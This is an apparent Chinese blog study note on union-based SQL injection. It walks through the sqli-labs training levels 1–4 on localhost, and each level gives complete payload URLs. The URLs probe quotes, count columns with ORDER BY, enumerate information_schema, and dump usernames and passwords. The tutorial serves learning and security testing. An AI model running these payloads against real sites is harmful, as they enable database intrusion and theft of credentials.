SQL注入学习之union联合查询注入

已于 2022-06-13 23:00:41 修改
阅读量4.1k 收藏 61
点赞数 11
文章标签: sql 学习 web安全
于 2022-06-13 09:08:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LTNSLALALA/article/details/125252991
版权

Ps:文章若有逻辑不正确的地方望评论指正!

文章目录

前言

Ps:此处描述本文主要内容:

  • 文章首先介绍了SQL注入的基本前提、原理及类型;
  • 其次着重描述了union联合查询注入方式;
  • 最后记录了在sqli-labs靶场的前4关中基于union联合查询注入的基本注入测试思路。

Ps:以下为正文内容,其中案例可供参考

一、SQL注入

1、前提条件

  • 前端用户传递到后端服务器的参数是可控的;
  • 传递的参数能够被代入到后端服务器中执行相关数据库操作指令。

Ps:通俗点讲就是当前想要进行SQL注入的Web界面是必须是动态网页,即前端数据与后端数据库进行交互,前端页面从后端获取数据信息进行显示。

2、攻击原理

  • 前端页面用户通过控制输入的参数信息,即输入特殊拼接的sql代码语句命令;
  • 后端数据库对前端用户输入的参数过滤规则等安全设置不严谨;
  • 致使后端获取到用户输入的恶意代码后当做后端正常的sql语句代码执行;
  • 最后导致系统泄露关键敏感信息、用户绕过系统登录验证并借助数据库存储过程进行提权。

3、主要注入类型

Ps1:按照数据类型分类
1)数字型
2)字符型
3)搜索型
Ps2:按照提交方式分类
1)GET型
2)POST型
3)Cookie型
4) Http请求头注入
Ps3:按照执行效果分类
1)报错注入
2)联合查询盲注
3)盲注
4) 堆查询注入

二、union联合查询注入

1、使用条件

  • 页面对不同的查询语句有不同的回显结果
  • 根据每一步的返回结果判断和进行下一步操作

2、基本流程

0)判断是否具有sql注入条件
1)判断sql注入漏洞是否存在及类型
2)判断sql查询字段数
3)判断回显点
4) 爆库名
5) 爆表名
6) 爆字段名
7) 爆数据

三、sqli-labs闯关笔记

1、Less-1 GET - Error based - Single quotes -String(基于错误的GET单引号字符型注入)

1) 判断是否存在sql注入条件、sql注入漏洞、sql注入类型

思路之攻击者视角:黑盒测试

  • 为了进行sql注入,首先我们需要判断该网页是否具有sql注入的前提条件之一:即是否是动态网页,前后端是否具有数据交互功能
     访问第一关初始主页,提示输入id参数,但是页面没有可输入点,猜测输入点在网页URL处
    在这里插入图片描述
     在网页URL后输入http://localhost:8888/Less-1/?id=1,页面回显得到两个数据信息,可知该网页是动态网页,具有sql注入的前提条件
    在这里插入图片描述
    思路之开发人员视角:白盒测试
    Ps:虽然真实情况下我们并不能看到,但初级学习阶段可以利用后端代码思考如何进行sql注入
  • 查看后端Less-1代码index.php
    可看到前端到后端的传参代码:该代码可以从前端页面获取用户输入的参数信息,并传送给后端Web服务器
    在这里插入图片描述
     可看到后端Web服务器中的关键sql查询语句:SELECT * FROM users WHERE id='$id' LIMIT 0,1;可以看到开发人员在编写代码时获取到的用户参数外添加了字符‘’,因此我们可以根据此代码思考前端进行sql注入时拼接代码欺骗后端服务器该怎么输入相应的sql语句,使其能够在后端服务器中正确执行达到我们想要的执行效果。
     该段代码执行的即为后端代码如何利用获取到的前端页面传送的参数在数据库中进行sql查询校验,后端服务器根据校验结果返回给前端不同的页面信息。
    在这里插入图片描述

思路之回到攻击者视角:在了解完后端开发人员代码编写思路后,我们开始尝试进行sql注入

  • 方法步骤1:单引号判断法----最常用和基础的sql注入漏洞是否存在的判断方法,因为无论字符型还是整型都会因为单引号个数不匹配而报错。
     输入http://localhost:8888/Less-1/?id=1’,页面回显错误信息,发现可能存在语法漏洞
    在这里插入图片描述 进一步探索,输入http://localhost:8888/Less-1/?id=1’ -- -;页面回显正常,探测到可能后端开发人员的编码是‘’字符型传参
    在这里插入图片描述
  • 方法步骤2:布尔表达式(逻辑与为真和假两种情况)判断法:如果按照正常的逻辑能回显相应的页面,即表示存在sql注入点
     输入http://localhost:8888/Less-1/?id=1' and 1=1 -- -(逻辑与为真),页面回显正常
    在这里插入图片描述
     输入http://localhost:8888/Less-1/?id=1' and 1= 2 -- -(逻辑与为假),页面没有回显
    在这里插入图片描述
     由此判断该处具有sql注入点,且为字符型注入漏洞
  • 判断sql注入漏洞类型
    Ps:通常sql注入漏洞分为数字型和字符型两种,具体种类可通过布尔表达式的回显情况判断
     输入http://localhost:8888/Less-1/?id=1’ and ‘1’=’1注入,成功执行
    在这里插入图片描述
     输入http://localhost:8888/Less-1/?id=1’ and 1=1注入,执行失败
    在这里插入图片描述
     输入http://localhost:8888/Less-1/?id=1’ and 1=1 -- -注入,成功执行
    在这里插入图片描述
     可看出在加字符情况下回显正常,不加字符情况下回显错误,所以该处为字符型注入漏洞
     对应的后端服务器mysql执行语句:
    SELECT * FROM users WHERE id='1' or '1'='1' LIMIT 0,1
    SELECT * FROM users WHERE id='' or 1=1 ---' LIMIT 0,1

2) 判断sql语句查询的属性字段数

方法:利用order by猜测和判断sql语句查询的属性字段数
判断列数的原因:

  • 限制因素:union函数进行联合查询的条件:union前面查询语句查询的元素需要和后面拼接的查询语句查询元素数量一致

order by能够判断列数的原因:

  • order by 即对查询的数据进行分组排序,分组排序依据为查询内容的属性,如若前面查询内容总属性为3,如果我们输入order by 4,后端代码执行时就会回显错误信息给前端页面,由此我们就能判断sql语句查询的属性列数。
     输入http://localhost:8888/Less-1/?id=1’ order by 3 #注入,成功执行
    在这里插入图片描述
     输入http://localhost:8888/Less-1/?id=1’ order by 4 -- -注入,执行失败,探测到sql语句查询属性列数为3
    在这里插入图片描述
     提示:此处猜测判断可通过二分法进行试错
     注意:这里突然多了中间的后端sql执行语句是因为在后端sql查询语句执行代码中添加了以下两行代码
    在这里插入图片描述
    echo $sql;
    echo "<br>";

3) 判断显示字段位

方法:利用联合函数 union 来查询回显的显示位:
目的:后端代码可能查询n个字段位数,但是显示给前端的只有m个字段位数(m<n),攻击者需要确定哪些位是能看到回显信息的,不然攻击时获取关键信息就很难受
 输入http://localhost:8888/Less-1/?id=-1’ union select 1,2,3 -- -发现回显出2,3字段位信息,接下来攻击者就可以利用 2,3位字段来显示攻执行sql注入以获取回显的各种数据库信息
在这里插入图片描述
Ps:设置id=-1’原因:我们发现前端页面只输出一条记录,因此攻击者利用联合查询函数时为了判断是哪几位可用,并输出到页面提示,就需要设置union前面的查询结果为假,这样自然数据库返回的就是后一条我们攻击者sql注入的查询结果;所以union后面使用selcet 1,2,3时,返回2,3即表示第2,3位为可用的显示位。

4) 爆数据库版本、数据库名

方法:联合利用数据库内置函数对数据库进行sql注入:此处利用了两个内置函数
version()函数:获取当前数据库版本信息
database()函数:获取当前数据库名
 输入http://localhost:8888/Less-1/?id=-1' union select 1,2,version() -- -爆出当前数据库版本号:5.7.26
在这里插入图片描述
Ps:通过此步可以判断数据库是否具有information_schema基本架构库:mysql5.0以上版本特有,5.0以下版本没有
 输入http://localhost:8888/Less-1/?id=-1' union select 1,2,database() -- -爆出当前数据库名:security
在这里插入图片描述

5) 爆数据库表名、数据库属性字段列名、关键敏感数据信息

方法:联合利用mysql数据库本身的information_schema库的三张关键表的关键字段进行sql注入
information_schema 库爆库语句:
union select group_concat(schema_name);涉及schemata表
information_schema 库爆表语句:
union select group_concat(table_name);涉及tables表:包含table_shema(数据库名)、table_name(数据表名)字段
information_schema 库爆属性字段语句:
union select group_concat(column_name);涉及columns表:包含table_schema、table_name、column_name(属性字段名)字段
 输入?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- -
爆出security数据库所有表名,并通过group_concat()函数将查询到的表名组合在一起并输出为一条数据:
在这里插入图片描述
 获取到所有表名后,选择可能包含敏感信息的表进行查询,比如users表。
 输入?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- -爆出users表属性字段列名。
在这里插入图片描述
 输入?id=-1' union select 1,2,group_concat(username,'--',password) from security.users -- -爆出关键敏感数据信息
在这里插入图片描述
 或者也可输入?id=-1' union select1,group_concat(username),group_concat(password) from security.users -- -使用2,3位查询属性字段列表中的具体值信息
在这里插入图片描述

2、Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

在这里插入图片描述原理和流程类似第一关
1) 判断是否具有SQL注入条件、是否具有SQL注入漏洞、SQL注入类型

  • URL处输入?id=2,页面回显数据信息,判断出具有sql注入条件
    在这里插入图片描述
  • URL处输入?id=2’,页面回显错误信息,初步判断具有语法漏洞
    在这里插入图片描述
  • URL处输入?id=2’ #,页面回显错误信息
    在这里插入图片描述
  • URL处输入?id=2 #,页面回显正常数据信息
    在这里插入图片描述
  • URL处输入?id=2 and 1=1 #,页面回显正常数据信息
    在这里插入图片描述
  • URL处输入?id=2 and 1=2 #,页面无数据信息回显,判断出此处存在数字型SQL注入漏洞
    在这里插入图片描述
    2) 利用order by二分法探测sql查询属性字段列数
  • URL处输入?id=2 order by 5 #,页面回显错误信息
    在这里插入图片描述
  • URL处输入?id=2 order by 3 #,页面回显正确数据信息
    在这里插入图片描述
  • URL处输入?id=2 order by 4 #,页面回显正确错误信息,由此可以判断出sql查询属性字段列数为3
    在这里插入图片描述
    3)利用union联合函数探测回显显示位
  • URL处输入?id=-2 union select 1,2,3 #,页面回显2,3位数据信息,由此可以判断出可利用回显显示位为第2、3位
    在这里插入图片描述
    4) 联合利用数据库内置函数:version()/database()探测数据库版本、数据库库名
  • URL处输入?id=-2 union select 1,version(),database() #页面2、3位分别回显数据库版本信息、数据库名
    在这里插入图片描述
  • 此外,通过数据库版本,我们可以获知接下来可以利用其特有的information_schema基础架构库
    5) 联合利用inforation_schema库tables表探测security数据库表名
  • URL处输入?id=-2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’seceurity’ #;可以看到页面第三位爆出securiy库中所有表名
    在这里插入图片描述
  • 根据爆出的所有数据表,我们针对性的挑选可能存在敏感信息的users表继续进行探测
    6) 联合利用inforation_schema库columns表探测users数据表属性字段列名
  • URL处输入?id=-2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' #;可以看到页面第三位爆出users表中所有属性字段列名
    在这里插入图片描述
    7) 探测数据库关键信息
  • URL处输入?id=-2 union select 1,group_concat(username),group_concat(password) from users #;页面2、3位爆出(username、password)关键敏感信息
    在这里插入图片描述

3、Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

在这里插入图片描述
原理和流程类似第一关

1) 判断是否具有SQL注入条件、是否具有SQL注入点、SQL注入类型
 URL处输入?id=3,页面回显数据信息,判断出具有sql注入条件
在这里插入图片描述
 URL处输入?id=3’,页面回显错误信息,初步判断具有语法漏洞
在这里插入图片描述 URL处输入?id=3’ #,页面回显错误信息
在这里插入图片描述
 URL处输入?id=3’) -- -,页面回显正常数据信息
在这里插入图片描述
 URL处输入?id=3’) and 1=1 -- -,页面回显正常数据信息
在这里插入图片描述
 URL处输入?id=3’) and 1=2 -- -,页面无数据信息回显,判断出此处存在(‘’)字符型SQL注入漏洞
在这里插入图片描述
2) 利用order by二分法探测sql查询属性字段列数
 URL处输入?id=3’) order by 5 -- -,页面回显错误信息
在这里插入图片描述
 URL处输入?id=3’) order by 3 -- -,页面回显正确数据信息
在这里插入图片描述
 URL处输入?id=3’) order by 4 -- -,页面回显正确错误信息,由此可以判断出sql查询属性字段列数为3
在这里插入图片描述
3) 利用union联合函数探测回显显示位

 URL处输入?id=-3’) union select 1,2,3 -- -,页面回显2,3位数据信息,由此可以判断出可利用回显显示位为第2、3位
在这里插入图片描述
4) 联合利用数据库内置函数:version()/database()探测数据库版本、数据库库名
 URL处输入?id=-3’) union select 1,version(),database() -- -页面2、3位分别回显数据库版本信息、数据库名
在这里插入图片描述
5) 联合利用inforation_schema库tables表探测security数据库表名
 URL处输入?id=-3') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' -- -;可以看到页面第三位爆出securiy库中所有表名
在这里插入图片描述
6) 联合利用inforation_schema库columns表探测users数据表属性字段列名
 URL处输入?id=-3’) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' -- -;可以看到页面第三位爆出users表中所有属性字段列名
在这里插入图片描述
7) 探测数据库关键信息
URL处输入?id=-3') union select 1,group_concat(username),group_concat(password) from users -- -;页面2、3位爆出(username、password)关键敏感信息
在这里插入图片描述

4、Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

在这里插入图片描述
原理和流程类似第一关
1) 判断是否具有SQL注入条件、是否具有SQL注入点、SQL注入类型
 URL处输入?id=4,页面回显数据信息,判断出具有sql注入前提条件
在这里插入图片描述
 URL处输入?id=4’,页面回显错误信息,初步判断具有语法漏洞
在这里插入图片描述
 URL处输入?id=4\ #,页面回显错误信息
在这里插入图片描述
 URL处输入?id=4”) -- -,页面回显正常数据信息
在这里插入图片描述
 URL处输入?id=4”) and 1=1 -- -,页面回显正常数据信息
在这里插入图片描述
 URL处输入?id=4”) and 1=2 -- -,页面无数据信息回显,判断出此处存在(“”)字符型SQL注入漏洞
在这里插入图片描述
2) 利用order by二分法探测sql查询属性字段列数
 URL处输入?id=4”) order by 5 -- -,页面回显错误信息
在这里插入图片描述
 URL处输入?id=4”) order by 3 -- -,页面回显正确数据信息
在这里插入图片描述
 URL处输入?id=4”) order by 4 -- -,页面回显正确错误信息,由此可以判断出sql查询属性字段列数为3
在这里插入图片描述
3) 利用union联合函数探测回显显示位
 URL处输入?id=-4”) union select 1,2,3 -- -,页面回显2,3位数据信息,由此可以判断出可利用回显显示位为第2、3位
在这里插入图片描述
4) 联合利用数据库内置函数:version()/database()探测数据库版本、数据库库名
 URL处输入?id=-4”) union select 1,version(),database() -- -页面2、3位分别回显数据库版本信息、数据库名
在这里插入图片描述
 此外,通过数据库版本,我们可以获知接下来可以利用其特有的information_schema基础架构库
5) 联合利用inforation_schema库tables表探测security数据库表名
 URL处输入?id=-4") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' -- -;可以看到页面第三位爆出securiy库中所有表名
在这里插入图片描述
 根据爆出的所有数据表,我们针对性的挑选可能存在敏感信息的users表继续进行探测
6) 联合利用inforation_schema库columns表探测users数据表属性字段列名
 URL处输入?id=-4") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' -- -;可以看到页面第三位爆出users表中所有属性字段列名
在这里插入图片描述
7) 探测数据库关键信息
 URL处输入?id=-4") union select 1,group_concat(username),group_concat(password) from users -- -页面2、3位爆出(username、password)关键敏感信息
在这里插入图片描述

是西红狮啊
关注
  • 11
    点赞
  • 61
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
sql注入——联合注入union select
4pri1
05-22 1597
联合注入 Select * from users where id = 1; mysql> select * from t_unv where unv_id =1 union select 1,2,schema_name from information_schema.schemata; 这里的本来3的位置由schema_name替换,就是第二个图片中查询的所示。 这么写,就通过union select 把本来查询的东西拼接到了3的回显位置上。 mysql> select...
SQL注入漏洞-02】union注入联合查询)靶场实战
cc
02-01 6794
为了更清楚的看清sql语句的执行与变化过程,我们先修改源代码,打开Less-1/index.php,在源码中添加如下语句将执行的sql语句打印出来,方便我们查看。我们观察页面会发现,当我们输入id=1和id=2时,页面中的name和password的值是不一样的,说明我们输入的数据和数据库有交互并且将数据显示到页面上了。如果不知道表名也不影响,根据mysql数据库特性,select语句在执行的过程中,并不需要指定表名。,页面发生报错,说明后端未对前端发送的数据没有很好的过滤,产生了sql注入漏洞。
浅谈SQL注入中的-1‘ union select 1,2,3#
dzqxwzoe的博客
03-12 950
经过本文的阅读,相信小白已经可以理解SQL注入语句中的这条语句了吧?将上面所有的内容概括为一句话就是大家常说的:判断回显位。当然,这条语句并不是固定的,要根据目标数据库返回的报错信息等各种情况来构造针对目标数据库的SQL注入语句。
SQL注入——union查询注入_报错注入 笔记
mikeyning的博客
07-15 1445
SQL注入——union查询注入_报错注入 学习环境 Centos7 sqli-labs union查询注入 1.UNION UNION操作符用于合并两个或多个SELECT语句的结果集 PS:UNION 内部的 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELELCT 语句中列的顺序必须相同 默认情况,UNION操作符选取不同的值。如果允许重复的值,请使用 UNION ALL 2.UNION注入应用场景 a,只要UNION连接的几个查询的字段数一样且列的数据类型转换没有
sql注入-union select
热门推荐
我不是大牛
06-24 2万+
什么是SQL注入 SQL注入Sql Injection ) 是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击 这些参数传递给后台的SQL数据库服务器加以解析并执行 哪里存在SQL注入? GET POST HTTP头部注入 Cookie注入 任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入SQL注入的分类 根据SQL数据类型分类 整型注...
sql注入杂谈(一)--union select
weixin_43570648的博客
03-19 1420
我就简单说说我对于联合注入的想法,以及对于联合注入绕过防火墙的方法,(只是我自己目前所掌握的方法,当然更多奇淫技巧还的需要我们自己去发掘)对于我们才学习安全的人来说,对于练习sql注入,我们学习最简单的语法就是sql注入之联合注入。 就拿sqli-labs来说说吧127.0.0.1/less-1/?id=1 我们的教程里面就说127.0.0.1/less-1/?id=1’ 加上单引号,看爆不爆错,...
sql注入中的union select 1,2,3....
yy
03-15 2万+
sql注入联合查询中,我们会碰到union select 1,2,3。那这个是什么意思了,首先先看下union select union select 用来合并两个或多个 SELECT 语句的结果集。比如这里新建了两个表,users和users2 users表如下 users2如下 联合查询,即查询users表中的name字段的值和查询users2表中的address字段的值,将结果一起返回 注意:union select只能查询两个表中共同都有的字段,如果一个字...
sql注入中的union联合查询union select 1,2,3
m0_51756263的博客
07-10 8682
sql注入中的union联合查询union select 1,2,3
SQL注入联合查询注入
qq_45691294的博客
07-11 6694
MySQL中的联合查询 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合在一起,使用为此为UNINO或UNION ALL 联合查询:将多个查询的结果合并到一起(纵向合并):字段数不变,多个查询的记录数合并 基本语法: select 语句 union[union选项] select 语句; 联合查询注入的条件 联合查询注入是MySQL注入中的一种方式,在SQL注入中说了注入漏洞存在的相关条件,而联合查询注入这种方法需要满足查询的信息在前端有回显,回显数据的
sql注入-union注入union函数 联合注入
07-11 7036
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP...超级SQL注入工具目前支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
Sql注入平台.zip
02-21
一个在本地搭建的SQL注入的平台,能够进行SQL注入,适用于GET和POST场景 包含了基于union查询的注入、基于报错的注入、基于floor的报错注入、基于boolean的盲注、基于时间的盲注……
sql注入_表名、列名字典
05-06
union select * from 表名字典 union select 列名字典 from 表名
SQL Server的基本操作示例
weixin_58566539的博客
04-29 508
SQL Server的基本操作示例
常用SQL命令
最新发布
wenxiaoba的博客
05-02 935
常用SQL语句使用说明和示例
优化SQL的方法
weixin_44139651的博客
04-26 1482
使用join实现,但不适合join太多表,阿里巴巴开发者手册的规定,join表的数量不应该超过3个,join表数量太多时,会导致mysql在选错索引。一般SQL优化第一考虑的是索引优化,可使用explain命令,查看MySQL的执行计划,确认SQL是否有走索引。相对连接查询,子查询使用in关键字实现,具有结构化,相对简单,但是需要创建和删除临时表,增加资源消耗。索引可提升SQL效率,但索引需要额外的存储空间,而且还会有一定的性能消耗。left join,两个表的交集,以及左表剩余的数据,左表为驱动表。
sql注入union联合查询
05-19
SQL注入是一种针对数据库的攻击方式,攻击者通过构造恶意输入,将SQL语句的语义进行修改,从而达到非法访问、篡改和删除数据等目的。其中,union联合查询就是SQL注入中常用的一种方式。 在SQL语句中,union是用来连接两条或多条select语句的关键字,它可以将两个查询结果合并成一个结果集。攻击者可以通过在输入框中输入一些特殊的字符或者语句,使得SQL语句被修改,例如: ``` SELECT * FROM users WHERE name = 'admin' AND password = '123456' ``` 攻击者可以在输入框中输入如下内容: ``` admin' UNION SELECT 1,2,3,4-- ``` 这样,SQL语句就会变成: ``` SELECT * FROM users WHERE name = 'admin' UNION SELECT 1,2,3,4--' AND password = '123456' ``` 这条SQL语句的含义是:先查询用户名为admin的用户信息,然后将查询结果与1,2,3,4合并成一个结果集。由于这条语句中的1,2,3,4并没有实际意义,所以攻击者可以通过不断尝试,来获取不同的信息。 为了防止SQL注入攻击,开发人员应该对输入的数据进行过滤和验证,特别是对于涉及到数据库操作的输入,更应该进行严格的验证和过滤。一般来说,可以采用参数化查询、白名单过滤、限制字符集等方式来防止SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是西红狮啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值